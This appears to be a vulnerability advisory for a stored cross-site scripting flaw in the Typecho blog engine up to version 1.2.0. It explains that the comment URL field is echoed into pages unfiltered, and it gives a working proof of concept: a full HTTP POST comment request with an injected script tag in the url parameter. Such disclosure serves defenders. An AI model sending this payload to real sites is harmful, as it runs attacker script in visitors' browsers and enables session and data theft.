Influenced Version
Typecho <= 1.2.0

Description
Typecho comments URL with Stored-XSS vulnerability.
1.Comment on an article in any capacity with xss payload.
2.In Comments /usr/themes/default/comments.php,The url parameter filters only the beginning without any other protection, and directly echoed to html.
3.XSS is triggered when the site is visited again.
71158-idx4of1ible.png

POC
POST /index.php/archives/1/comment with:

author=1&mail=12%4012&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=1221&_=9d8302e080b9c139354b528787f1e5e4

The full POC request:

POST /index.php/archives/1/comment HTTP/1.1
Host: 127.0.0.1
Content-Length: 143
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4

or type directly into the website below then commit:

82087-0hcv4gvuvii8.png

50933-vh848lmyd8.png

96691-8u54xpjlkd.png

76999-2y92mieg3cn.png

发表评论